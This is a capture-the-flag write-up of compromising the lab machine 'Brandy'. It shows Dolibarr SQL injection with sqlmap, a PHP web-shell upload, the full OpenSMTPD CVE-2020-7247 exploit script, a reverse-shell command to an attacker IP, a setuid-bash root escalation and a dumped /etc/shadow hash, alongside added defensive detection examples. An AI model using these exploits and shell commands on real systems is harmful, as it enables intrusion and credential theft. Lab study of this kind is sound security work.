brandy
nikto points to:
#### rick’s notes #### (in case i again forget – too much booze…)
vhost:crm.pwntilldawn.com
FLAG61=2971f3459fe55db1237aad5e0f0a259a41633962
visit crm.pwntilldawn.com (page source of the login page):
<!-- authentication mode = dolibarr -->
<!-- cookie name used for this session = DOLSESSID_5474197992fc593fa65df7a4b2996a9f -->
<!-- urlfrom in this session = -->
<!-- Common footer is not used for login page, this is same than footer but inside login tpl -->
The Dolibarr web application version 5.0.3 is vulnerable to SQL injection in multiple places. Exploiting this vulnerability lets an authenticated user inject arbitrary SQL statements, e.g. to dump the entire database.
In addition, the filter Dolibarr uses to prevent SQL injection can easily be bypassed by URL-encoding the SQL payloads. This can also be automated with sqlmap and the "charencode" tamper script.
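Added example (not code from this write-up, from Dolibarr or from sqlmap): it re-implements the transformation sqlmap's charencode tamper applies to a payload and shows why a keyword blocklist that looks at the request value before URL decoding never sees the keyword, while the SQL layer still gets the decoded payload. BLOCKED below is a constructed stand-in for such a filter, not Dolibarr's real check; the payload string is made up for the demo.

```python
# Added example; not code from the original write-up, from Dolibarr or from sqlmap.
# Re-implements sqlmap's "charencode" tamper and contrasts a blocklist applied to the
# raw (still-encoded) value with one applied after decoding.
import re
import string
from urllib.parse import unquote

# Constructed stand-in for a naive SQL keyword blocklist (NOT Dolibarr's filter).
BLOCKED = re.compile(r"\b(union|select|insert|update|delete|drop)\b", re.IGNORECASE)


def charencode(payload: str) -> str:
    """Percent-encode every character, leaving already-encoded %XX sequences
    untouched (the same rule sqlmap's charencode tamper uses)."""
    out = []
    i = 0
    while i < len(payload):
        if (payload[i] == "%" and i + 2 < len(payload)
                and payload[i + 1] in string.hexdigits
                and payload[i + 2] in string.hexdigits):
            out.append(payload[i:i + 3])       # keep an existing %XX as-is
            i += 3
        else:
            out.append("%%%02X" % ord(payload[i]))
            i += 1
    return "".join(out)


def naive_filter_blocks(raw_query_value: str) -> bool:
    """Vulnerable pattern: match keywords on the raw, still-encoded value."""
    return BLOCKED.search(raw_query_value) is not None


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing, so a double-encoded payload
    (%2555NION -> %55NION -> UNION) cannot hide a keyword either."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hardened_filter_blocks(raw_query_value: str) -> bool:
    """Same blocklist, but applied to the decoded value the SQL layer will see."""
    return BLOCKED.search(canonicalize(raw_query_value)) is not None


def server_sees(raw_query_value: str) -> str:
    """What the application is handed after the web layer decodes the query string once."""
    return unquote(raw_query_value)


def demo() -> dict:
    payload = "1 UNION SELECT 1,2"           # constructed demo payload
    encoded = charencode(payload)
    return {
        "encoded": encoded,
        "naive_blocks_plain": naive_filter_blocks(payload),
        "naive_blocks_encoded": naive_filter_blocks(encoded),
        "server_sees": server_sees(encoded),
        "hardened_blocks_encoded": hardened_filter_blocks(encoded),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point for defenders: a blocklist is at best defence in depth, and it is only meaningful if it runs on the canonical (decoded) value. The real fix for the injection is parameterised queries in the affected list/card pages.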
http://crm.pwntilldawn.com/documents/
http://10.150.150.27/dolibarr/comm/propal/list.php?mainmenu=commercial
FLAG62=543d3e087a6764fbeb3d42f58c59b78e201e7f69 (in the "Customer code" field of the third party "wizlynx group")
http://10.150.150.27/dolibarr/user/card.php?id=2
http://10.150.150.27/dolibarr/comm/propal/card.php?id=1
┌─[user@parrot-virtual]─[~/ptd/brandy]
└──╼ $ sqlmap -r req3.req --tamper=charencode
┌─[user@parrot-virtual]─[~/ptd/brandy]
└──╼ $ cat req3.req
GET /dolibarr/comm/propal/list.php?leftmenu=propals&viewstatut=0 HTTP/1.1
Host: 10.150.150.27
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: DOLSESSID_f0571041dc8c54860123aeb2450c451b=5474197992fc593fa65df7a4b2996a9f
Upgrade-Insecure-Requests: 1

┌─[user@parrot-virtual]─[~/ptd/brandy]
└──╼ $ sqlmap -r req3.req --tamper=charencode --batch --dump
$ sqlmap -r req3.req --dbs --batch
$ sqlmap -r req3.req --tamper=charencode --sql-shell
$ sqlmap -r req3.req --tamper=charencode --os-shell
-> sqlmap finds user cliff / donation
http://crm.pwntilldawn.com/don/index.php?leftmenu=donations&mainmenu=accountancy
FLAG64=6bf7c50b228c4672b590615b5cbcb73bb44614fd 1.00 04/13/2020 Validated
make a donation and attach a PHP file to it; Dolibarr stores the upload with a .noexe suffix:
http://crm.pwntilldawn.com/document.php?modulepart=don&file=2%2Fpuckie.php.noexe
edit the file and rename it through the app from puckie.php.noexe to puckieshell.php (the .noexe suffix is gone, so the web server executes it again)
then access it: http://crm.pwntilldawn.com/documents/don/2/puckieshell.php
└──╼ #nc -nlvp 53
listening on [any] 53 …
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.27] 47072
Linux Brandy 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:06:47 up 1:00, 1 user, load average: 0.04, 0.05, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
brandy tty1 – 29Sep20 26days 0.10s 0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
Brandy
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
wget http://10.66.66.42/1.py
┌─[user@parrot-virtual]─[~/ptd/brandy]
└──╼ $cat 1.py
# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3
from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))

# Banner check: the greeting has to identify OpenSMTPD.
res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
    print('[!] No OpenSMTPD detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

# Injection point: the sender's local part is accepted without validation and
# later ends up on a shell command line during local delivery.
print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
# Recipient must be a local user so the message goes through local delivery.
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
# Minimal body; delivery (and with it the injected command) runs after the final '.'.
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
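Added example, not part of the write-up and not OpenSMTPD's own code: a small checker for the malformed envelope sender the exploit above relies on. The script sends MAIL FROM:<;cmd;>, a local part that is not an RFC 5321 dot-atom, has no domain, and carries shell metacharacters. The atext character set is taken from RFC 5321; the "C:"/"S:" transcript format, the SHELL_META set and the sample session are constructed for this example.

```python
# Added example; not from the original write-up and not OpenSMTPD's code.
# Flags MAIL FROM reverse-paths shaped like the CVE-2020-7247 payload in a
# captured SMTP session.
import re
from typing import List, Optional, Tuple

# RFC 5321 atext: ALPHA / DIGIT / "!#$%&'*+-/=?^_`{|}~", joined by "." into a dot-atom.
DOT_ATOM = re.compile(
    r"^[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*$"
)
# Characters that matter once the string reaches /bin/sh -c (constructed set).
SHELL_META = set(";|&`$()<>\n\t ")
MAIL_FROM = re.compile(r"^MAIL FROM:\s*<(?P<path>[^>]*)>", re.IGNORECASE)
DIRECTION = re.compile(r"^[CS]:\s*")   # strips the "C: " / "S: " transcript prefixes


def parse_mail_from(line: str) -> Optional[str]:
    """Return the reverse-path inside MAIL FROM:<...>, or None for any other line."""
    m = MAIL_FROM.match(DIRECTION.sub("", line.strip()))
    return m.group("path") if m else None


def local_part_is_valid(addr: str) -> bool:
    """True if the local part is a dot-atom (quoted local parts are not handled)."""
    local = addr.rsplit("@", 1)[0]
    return DOT_ATOM.match(local) is not None


def classify(addr: str) -> str:
    """'ok', 'invalid' (bad syntax) or 'shell-injection' (bad syntax, no domain,
    shell metacharacters: the shape of the exploit's payload)."""
    if addr == "":
        return "ok"                       # empty reverse-path is legal (bounces)
    if local_part_is_valid(addr):
        return "ok"
    if "@" not in addr and any(c in SHELL_META for c in addr):
        return "shell-injection"
    return "invalid"


def scan_session(transcript: str) -> List[Tuple[int, str, str]]:
    """Return (line number, address, verdict) for every suspicious MAIL FROM."""
    findings = []
    for n, line in enumerate(transcript.splitlines(), 1):
        addr = parse_mail_from(line)
        if addr is None:
            continue
        verdict = classify(addr)
        if verdict != "ok":
            findings.append((n, addr, verdict))
    return findings


# Constructed transcript mirroring the exchange the exploit script performs.
SAMPLE_SESSION = """\
S: 220 Brandy ESMTP OpenSMTPD
C: HELO x
S: 250 Brandy Hello x [127.0.0.1], pleased to meet you
C: MAIL FROM:<;touch /tmp/x;>
S: 250 2.0.0 Ok
C: RCPT TO:<root>
S: 250 2.1.5 Destination address valid: Recipient ok
"""

if __name__ == "__main__":
    for n, addr, verdict in scan_session(SAMPLE_SESSION):
        print(f"line {n}: MAIL FROM:<{addr}> -> {verdict}")
```

This is a detection aid for captured sessions or mail logs, not a fix: the server-side fix is OpenSMTPD 6.6.2, which stops accepting such a sender. Note that the vulnerable server answered 250 to the bad MAIL FROM, so "did the server accept it" is not a usable signal; the sender syntax is.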
┌─[user@parrot-virtual]─[~/ptd/brandy]
$ python3 1.py
Usage 1.py <target ip> <target port> <command>
E.g. 1.py 127.0.0.1 25 'touch /tmp/x'
$ python3 1.py 127.0.0.1 25 'touch /tmp/x'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
$ ls -la
total 36
drwxrwxrwt 2 root root 4096 Jan 27 09:48 .
drwxr-xr-x 24 root root 4096 Apr 4 2020 ..
-rw-rw-rw- 1 www-data www-data 0 Jan 27 09:48 y
$
python3 1.py 127.0.0.1 25 'nc 10.66.66.142 443 -e /bin/bash'
but that didn't give a reverse shell
so just run 'chmod +s /bin/bash' through the exploit,
then bash -p and you're root
www-data@Brandy:/dev/shm$ python3 1.py 127.0.0.1 25 'chmod +s /bin/bash'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
bash-4.4$ bash -p
bash-4.4# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.4# cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
--snip--
sshd:*:18356:0:99999:7:::
mysql:!:18356:0:99999:7:::
brandy:$6$RuiaYFAl$a3fWptLaRSblY5Z3jkasInf6oLKrS8dUTcfL1H.KKbH9AOBTZN0nT4vHbI9tdFs4uXjkNq2F2hofDSEsDqPWp/:18365:0:99999:7:::
opensmtpd:*:18365:0:99999:7:::
opensmtpq:*:18365:0:99999:7:::
bash-4.4#
bash-4.4# cat FLAG66
This was a tricky machine … so if you read this, well done!
FLAG66=e075fab32dea389109b4a0023ffe9b4fb87d2feb
find / -iname "FLAG*"
cat /var/www/html/dolibarr/FLAG65
FLAG65=185d65d0fd6049385ab53eae8be28b2c79023bc2
found in user card 3 cliff http://crm.pwntilldawn.com/user/card.php?id=3
FLAG63=4eedbe365eede0a18ab90b63c209284dd653add9